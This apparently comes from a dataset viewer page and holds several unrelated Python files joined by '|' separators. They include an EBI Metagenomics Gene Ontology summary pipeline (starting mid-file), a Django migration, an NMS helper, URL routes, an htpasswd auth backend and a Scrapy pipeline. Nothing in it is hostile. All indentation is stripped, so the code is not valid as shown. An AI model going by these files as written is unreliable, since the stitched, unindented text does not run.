proteins_with_go=num_of_proteins_with_go,
num_of_unique_go_ids=len(go2protein_count))
return go2protein_count, processing_stats
@staticmethod
def parse_mapped_gaf_file(gaf_file):
"""
parse_mapped_gaf_file(gaf_file) -> dictionary
Example of GAF mapped output:
!gaf-version: 2.0
! This GAF has been mapped to a subset:
! Subset: user supplied list, size = 38
! Number of annotation in input set: 1326
! Number of annotations rewritten: 120
EMG GO:0005839 GO GO:0005839 PMID:12069591 IEA C protein taxon:1310605 20160528 InterPro
EMG GO:0000160 GO GO:0005575 PMID:12069591 IEA C protein taxon:1310605 20160528 InterPro
Parsing the above GAF file will create the following dictionary:
result = {'GO:0005839':'GO:0005839', 'GO:0000160':'GO:0005575'}
:param gaf_file:
:return:
"""
result = {}
if GOSummaryUtils.__pathExists(gaf_file):
handle = GOSummaryUtils.__fileOpen(gaf_file, "r")
for line in handle:
if not line.startswith("!"):
line = line.strip()
splitted_line = line.split("\t")
go_id = splitted_line[1]
mapped_go_id = splitted_line[4]
result.setdefault(go_id, set()).add(mapped_go_id)
return result
@staticmethod
def writeGoSummaryToFile(goSummary, outputFile):
handle = GOSummaryUtils.__fileOpen(outputFile, "w")
for go, term, category, count in goSummary:
handle.write('","'.join(['"' + go, term, category, str(count) + '"']) + "\n")
handle.close()
@staticmethod
def get_memory_info(process):
"""
get_memory_info(process) -> string
:param process: Represents an OS process object instantiated by module psutil.
:return: Returns the memory usage in MB.
"""
factor = 1024 * 1024
result = "Resident memory: " + str(process.memory_info().rss / factor) + "MB. Virtual memory: " + str(
process.memory_info().vms / factor) + "MB"
return result
@staticmethod
def create_gaf_file(gaf_input_file_path, go_id_set):
"""
:param gaf_input_file_path:
:param go2proteinDict:
:return: nothing
"""
with io.open(gaf_input_file_path, 'w') as file:
file.write(u'!gaf-version: 2.1\n')
file.write(u'!Project_name: EBI Metagenomics\n')
file.write(u'!URL: http://www.ebi.ac.uk/metagenomics\n')
file.write(u'!Contact Email: metagenomics-help@ebi.ac.uk\n')
for go_id in go_id_set:
gaf_file_entry_line_str = 'EMG\t{0}\t{1}\t\t{2}\tPMID:12069591\tIEA\t\t{3}\t\t\tprotein\ttaxon:1310605\t{4}\t{5}\t\t'.format(
go_id,
'GO',
go_id,
'P',
'20160528',
'InterPro')
file.write(u'' + gaf_file_entry_line_str + '\n')
@staticmethod
def count_and_assign_go_annotations(go2protein_count, go_annotations, num_of_proteins):
for go_id in go_annotations:
count = go2protein_count.setdefault(go_id, 0)
count += 1 * num_of_proteins
go2protein_count[go_id] = count
@staticmethod
def count_slims(go_annotations_single_protein, map2slim_mapped_go_ids_dict, num_of_proteins, result):
# count goslims
slim_go_ids_set = set()
# Get the set of slim terms
for go_annotation in go_annotations_single_protein:
mapped_go_ids = map2slim_mapped_go_ids_dict.get(go_annotation)
if mapped_go_ids:
slim_go_ids_set.update(mapped_go_ids)
# Iterate over the set of slim terms and update the counts
for slim_go_id in slim_go_ids_set:
count = result.setdefault(slim_go_id, 0)
count += 1 * num_of_proteins
result[slim_go_id] = count
@staticmethod
def parse_iprscan_output_goslim_counts(iprscanOutput, map2slim_mapped_go_ids_dict):
# result -> GO accessions mapped to number of occurrences
# Example {'GO:0009842':267, 'GO:0009841':566}
result = {}
if GOSummaryUtils.__pathExists(iprscanOutput):
handle = GOSummaryUtils.__fileOpen(iprscanOutput, "r")
# Example GO Id -> GO:0009842
goPattern = re.compile("GO:\d+")
line_counter = 0
previous_protein_acc = None
go_annotations_single_protein = set()
# Set default value for number of proteins to 1
num_of_proteins = 1
for line in handle:
line_counter += 1
line = line.strip()
chunks = line.split("\t")
# Get protein accession
current_protein_acc = chunks[0]
num_of_proteins = len(current_protein_acc.split("|"))
# If new protein accession extracted, store GO annotation counts in result dictionary
if not current_protein_acc == previous_protein_acc:
previous_protein_acc = current_protein_acc
GOSummaryUtils.count_slims(go_annotations_single_protein, map2slim_mapped_go_ids_dict,
num_of_proteins, result)
# reset go id set because we hit a new protein accession
go_annotations_single_protein = set()
# Parse out GO annotations
# GO annotations are associated to InterPro entries (InterPro entries start with 'IPR')
# Than use the regex to extract the GO Ids (e.g. GO:0009842)
if len(chunks) >= 13 and chunks[11].startswith("IPR"):
for go_annotation in goPattern.findall(line):
go_annotations_single_protein.add(go_annotation)
# Do final counting for the last protein
GOSummaryUtils.count_slims(go_annotations_single_protein, map2slim_mapped_go_ids_dict,
num_of_proteins, result)
handle.close()
return result
@staticmethod
def random_word(Length):
from random import randint
assert (1 <= Length <= 26) # Verify 'Length' is within range
charlist = [c for c in "abcdefghijklmnopqrstuvwxyz"]
for i in xrange(0, Length):
other = randint(0, 25)
charlist[i], charlist[other] = charlist[other], charlist[i] # Scramble list by swapping values
word = ""
for c in charlist[0:Length]: word += c
return word.upper()
def run_map2slim(owltools_bin, core_gene_ontology_obo_file, metagenomics_go_slim_ids_file,
gaf_input_full_path, gaf_output_full_path):
try:
output = subprocess.check_output(
[
owltools_bin,
core_gene_ontology_obo_file,
'--gaf',
gaf_input_full_path,
'--map2slim',
'--idfile',
metagenomics_go_slim_ids_file,
'--write-gaf',
gaf_output_full_path
], stderr=subprocess.STDOUT, )
# print output
except subprocess.CalledProcessError, ex:
print "--------error------"
print ex.cmd
print ex.message
print ex.returncode
print ex.output
raise
except:
print "Unexpected error:", sys.exc_info()[0]
raise
if __name__ == '__main__':
description = "Go slim pipeline."
# Parse script parameters
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-c", "--config",
type=file,
help="path to config file",
required=False,
metavar="configfile",
default="config/go_summary-config.json")
parser.add_argument("-i", "--input-file",
help="InterProScan result file.",
required=True)
parser.add_argument("-o", "--output-file",
help="GO summary output file.",
required=True)
args = vars(parser.parse_args())
print "INFO: " + description
script_pathname = os.path.dirname(sys.argv[0])
script_full_path = os.path.abspath(script_pathname)
# InterProScan result file including the GO annotations
iprscan_output_file = args['input_file']
output_file = args['output_file']
if not os.stat(iprscan_output_file).st_size == 0:
# Get program configuration
configuration = json.load(args['config'])
temp_dir = configuration["temp_dir"]
# Create unique temporary file prefix
date_stamp = time.strftime("%Y%m%d%H%M%S")
random_word = GOSummaryUtils.random_word(8)
temp_file_prefix = date_stamp + "_" + random_word + "_"
# path to the latest version of the core gene ontology in OBO format
full_gene_ontology_obo_formatted = ''.join([script_full_path, '/', configuration["full_gene_ontology_obo_file"]])
# GO slim banding file
go_slim_banding_file = ''.join([script_full_path, '/', configuration["metagenomics_go_slim_banding_file"]])
# Map2Slim program parameters
metagenomics_go_slim_ids_file = ''.join([script_full_path, '/', configuration["metagenomics_go_slim_ids_file"]])
owltools_bin = ''.join([script_full_path, '/', configuration["owltools_bin_file"]])
# psutil is a library for retrieving information on running processes
process = psutil.Process(os.getpid())
print "Process id: " + str(os.getpid())
print "Initial memory: " + GOSummaryUtils.get_memory_info(process)
# Create temporary file names, necessary to run map2slim
gaf_input_temp_file_path = temp_dir + temp_file_prefix + 'pipeline_input_annotations.gaf'
gaf_output_temp_file_path = temp_dir + temp_file_prefix + 'pipeline_mapped_annotations.gaf'
print "Creating temp files under: " + gaf_input_temp_file_path
# Parse InterProScan result file; map protein accessions and GO terms
print "Parsing the InterProScan result output file: " + iprscan_output_file
go2protein_count_dict, processing_stats = GOSummaryUtils.parseIprScanOutput(iprscan_output_file)
print "Finished parsing."
print "After parsing the InterProScan result file: " + GOSummaryUtils.get_memory_info(process)
# Generate GO summary
print "Loading full Gene ontology: " + full_gene_ontology_obo_formatted
core_gene_ontology_list = GOSummaryUtils.get_gene_ontology(full_gene_ontology_obo_formatted)
print "Finished loading."
print "After loading the full Gene ontology: " + GOSummaryUtils.get_memory_info(process)
print "Generating full GO summary..."
topLevelGoIds = ['GO:0008150', 'GO:0003674', 'GO:0005575']
full_go_summary = GOSummaryUtils.getFullGOSummary(core_gene_ontology_list, go2protein_count_dict, topLevelGoIds)
print "After generating the full GO summary: " + GOSummaryUtils.get_memory_info(process)
# delete core gene ontology list
del core_gene_ontology_list
print "Finished generation."
print "Writing full GO summary to the following file: " + output_file
GOSummaryUtils.writeGoSummaryToFile(full_go_summary, output_file)
# delete full GO summary variable
del full_go_summary
print "Finished writing."
# Generating the GAF input file for Map2Slim
print "Generating the GAF input file for Map2Slim..."
go_id_set = go2protein_count_dict.keys()
# delete GO to protein dictionary variable
del go2protein_count_dict
GOSummaryUtils.create_gaf_file(gaf_input_temp_file_path, go_id_set)
num_of_gaf_entries = len(go_id_set)
del go_id_set
print "Finished GAF file generation."
# Generate GO slim
# Run Map2Slim for more information on how to use the tool see https://github.com/owlcollab/owltools/wiki/Map2Slim
print "Memory before running Map2Slim: " + GOSummaryUtils.get_memory_info(process)
print "Running Map2Slim now..."
run_map2slim(owltools_bin, full_gene_ontology_obo_formatted, metagenomics_go_slim_ids_file,
gaf_input_temp_file_path, gaf_output_temp_file_path)
print "Map2Slim finished!"
print "Parsing mapped annotations..."
go2mapped_go = GOSummaryUtils.parse_mapped_gaf_file(gaf_output_temp_file_path)
print "Finished parsing."
print "Getting GO slim counts by parsing I5 TSV again"
go_slims_2_protein_count = GOSummaryUtils.parse_iprscan_output_goslim_counts(iprscan_output_file, go2mapped_go)
print "After getting GO slim counts: " + GOSummaryUtils.get_memory_info(process)
go_slim_summary = GOSummaryUtils.get_go_slim_summary(go_slim_banding_file, go_slims_2_protein_count)
go_slim_output_file = output_file + '_slim'
print "Writing GO slim summary to the following file: " + go_slim_output_file
GOSummaryUtils.writeGoSummaryToFile(go_slim_summary, go_slim_output_file)
# delete full GO summary variable
del go_slim_summary
print "Finished writing."
# deleting temporary files
try:
os.remove(gaf_input_temp_file_path)
os.remove(gaf_output_temp_file_path)
except OSError:
pass
except:
raise
"============Statistics============"
print "Parsed " + str(processing_stats.num_of_lines) + " lines in the InterProScan result file."
print "Found " + str(processing_stats.num_of_proteins) + " proteins in the InterProScan result file."
print str(processing_stats.proteins_with_go) + " out of " + str(
processing_stats.num_of_proteins) + " proteins do have GO annotations."
print "Found " + str(
processing_stats.num_of_unique_go_ids) + " unique GO identifiers in the InterProScan result file."
print "Created " + str(num_of_gaf_entries) + " GAF entries to feed Map2Slim."
print "Program finished."
else:
with open("empty.summary.go", "w") as empty_summary:
empty_summary.close()
with open("empty.summary.go_slim", "w") as empty_slim:
empty_slim.close()
sys.stdout.write("input file empty, writing empty output files")
sys.stderr.write("input file empty, writing empty output files")
|
from utils.train import train_process
if __name__ == '__main__':
train_process()
|
# Generated by Django 2.2.6 on 2019-12-02 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0002_auto_20191029_1004'),
]
operations = [
migrations.RenameField(
model_name='task',
old_name='input',
new_name='input_hidden',
),
migrations.RenameField(
model_name='task',
old_name='output',
new_name='output_hidden',
),
migrations.AddField(
model_name='task',
name='input_public',
field=models.TextField(default='changeme'),
preserve_default=False,
),
migrations.AddField(
model_name='task',
name='output_public',
field=models.TextField(default='changeme'),
preserve_default=False,
),
]
|
import numpy as np
import torch
from . import nms_cython_backend, nms_torch_backend
def nms(dets, iou_thr, return_inds=False):
"""Dispatch to either CPU or GPU NMS implementations.
The input can be either a torch tensor or numpy array. GPU NMS will be used
if the input is a gpu tensor or device_id is specified, otherwise CPU NMS
will be used. The returned type will always be the same as inputs.
Arguments:
dets (torch.Tensor or np.ndarray): bboxes with scores.
iou_thr (float): IoU threshold for NMS.
Returns:
tuple: kept bboxes and indice, which is always the same data type as
the input.
"""
if dets.shape[0] == 0:
if not return_inds:
return dets
else:
return dets, [0]
# convert dets (tensor or numpy array) to tensor
if isinstance(dets, torch.Tensor):
# sort
inds = torch.argsort(dets[:, 4], descending=True)
dets = dets[inds].contiguous()
keep_inds = nms_torch_backend.forward(dets, float(iou_thr)).long()
dets = dets[keep_inds].contiguous()
keep_inds = inds[keep_inds]
elif isinstance(dets, np.ndarray):
keep_inds = nms_cython_backend.nms(dets, iou_thr)
dets = dets[keep_inds]
assert not return_inds
else:
raise TypeError(
'dets must be either a Tensor or numpy array, but got {}'.format(
type(dets)))
if return_inds:
return dets, keep_inds
else:
return dets
|
# Copyright (c) Code Written and Tested by Ahmed Emad in 28/02/2020, 16:53
from django.urls import path
from core.views import RedirectView, ShortenView
app_name = 'core'
urlpatterns = [
path('shorten', ShortenView.as_view(), name='shorten'),
path('<str:url>', RedirectView.as_view(), name='redirect')
]
|
from utils.cards import get_deck
from .common import get_turn
def initial_state(players):
deck = []
min_cards = 4 * len(players) + (5 + 4 + 3 + 2 + 1)
while len(deck) < min_cards:
deck.extend(get_deck())
state = {
'stage': 'cards',
'deck': deck,
'hands': {player: [] for player in players},
}
state['turn'] = get_turn(state)
return state
|
from django.conf import settings
from django.contrib.auth.models import User
from htauth.htpasswd import check_password, NoSuchUser
class HtauthBackend(object):
supports_inactive_user = False
def authenticate(self, username=None, password=None):
password_file = settings.HTAUTH_PASSWD_FILENAME
try:
login_valid = check_password(username, password, password_file)
except NoSuchUser:
return None
if not login_valid:
return None
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
# Create a new user. Note that we can set password
# to anything, because it won't be checked; the password
# from settings.py will.
#user = User(username=username, password=UNUSABLE_PASSWORD)
#user.is_staff = True
#user.is_superuser = True
#user.save()
user = User.objects.create_user(username)
return user
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
from .items import Topic, Reply
from .spiders.tools import get_hour, map_add, sortmap, write_map_to_csv, get_date
class ScrcolgPipeline(object):
hours = {}
dates = {}
topictypes = {}
replyauthors = {}
topicauthors = {}
counttopics = 0
countreplies = 0
def open_spider(self, spider):
self.file1 = open('./tempdata/counttopic', 'w')
self.file2 = open('./tempdata/countreply', 'w')
return
def close_spider(self, spider):
print("总共统计帖子数:"+str(self.counttopics))
print("总共统计回复数:" + str(self.countreplies))
write_map_to_csv(self.dates, './tempdata/date.csv')
write_map_to_csv(self.hours, './tempdata/hours.csv')
write_map_to_csv(sortmap(self.topictypes), './tempdata/topictypes.csv')
write_map_to_csv(sortmap(self.replyauthors), './tempdata/replyauthors.csv')
write_map_to_csv(sortmap(self.topicauthors), './tempdata/topicauthors.csv')
self.file1.close()
self.file2.close()
return
def process_item(self, item, spider):
map_add(get_hour(item['date']), self.hours)
map_add(get_date(item['date']), self.dates)
author = item['author']
line =item['content'] + "\n"
if isinstance(item, Topic):
self.counttopics+=1
type = item['type']
map_add(type, self.topictypes)
map_add(author, self.topicauthors)
self.file1.write(line)
if isinstance(item, Reply):
self.countreplies+=1
map_add(author, self.replyauthors)
self.file2.write(line)
return item
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.